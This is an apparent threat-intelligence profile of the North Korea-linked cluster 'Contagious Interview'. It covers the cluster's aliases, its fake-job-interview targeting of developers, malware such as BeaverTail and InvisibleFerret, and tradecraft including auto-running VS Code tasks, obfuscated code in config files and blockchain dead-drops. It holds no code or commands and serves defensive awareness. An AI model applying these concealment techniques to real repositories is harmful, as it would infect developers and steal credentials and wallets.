Contagious Interview

Contagious Interview is a North Korea-linked threat actor cluster, also described in the provided reporting as DPRK-connected or North Korea-aligned/state-sponsored. Known aliases in the content include UNC5342, Famous Chollima, Void Dokkaebi, DeceptiveDevelopment, DEV#POPPER, BeaverTail, InvisibleFerret, OtterCookie, Gwisin Gang, and Tenacious Pungsan. The content also notes overlap with WageMole campaigns and links or similarities to Lazarus, BlueNoroff, APT38, and broader Lazarus umbrella activity. The group primarily targets software developers, especially those involved in cryptocurrency projects, through fake job interviews, recruiter personas, bogus technical assessments, trojanized codebases, compromised open-source packages, and malicious repositories. Reported targeting includes PHP developers via a compromised Packagist package, developers via poisoned npm packages, and broader software developers globally through sham cryptocurrency-company recruiting. The content also describes the group’s role in North Korean remote IT-worker fraud schemes, including long-term relationship building with high-value targets and use of AI-assisted workflows to sustain high operational tempo. Observed malware and tooling in the content include BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, Tropidoor, TsunamiKit, MicrosoftSystem64, and activity aligned with PHANTOMPULSE/REF6598. BeaverTail is described as an infostealer/downloader used in fake job challenges and staged delivery; InvisibleFerret as a modular malware family providing information theft and remote control; OtterCookie as a BeaverTail-like stealer; Tropidoor as a backdoor with substantial code overlap to Lazarus PostNapTea; TsunamiKit as a multi-stage toolkit including droppers, installers, Tor proxy, coinminers, and a .NET spyware payload; and MicrosoftSystem64 as a cross-platform RAT stealing browser credentials, cryptocurrency wallet data, Telegram sessions, SSH keys, keystrokes, and screenshots while using HuggingFace for payload hosting and exfiltration. Tradecraft described in the content includes use of malicious VS Code tasks in .vscode/tasks.json for automatic execution when a workspace is trusted; obfuscated JavaScript hidden in ignored configuration files such as tailwind or eslint configs; commit tampering to conceal malicious changes; blockchain-based dead-drop resolvers and payload hosting on TRON, Aptos, BNB Smart Chain, Ethereum, Base, and Optimism; XOR, Base64, hexadecimal string encoding, and other obfuscation; use of AnyDesk; VBS scripts to launch cmd.exe and batch files; Startup-folder persistence via InvisibleFerret; exfiltration to actor-controlled C2 and Dropbox; OS fingerprinting via browser User-Agent; and requests that victims disable Docker or other container environments to ensure infection. The content also attributes broader campaigns to this cluster involving compromised open-source ecosystems and cryptocurrency-focused intrusions. These include poisoned npm packages, a compromised Packagist development branch, and malware delivery through fake interview workflows. Additional reporting in the content links Contagious Interview to campaigns targeting the cryptocurrency sector and developers, with malware capable of credential theft, wallet theft, screenshot capture, keylogging, clipboard monitoring, persistence across Windows/macOS/Linux, and follow-on payload delivery.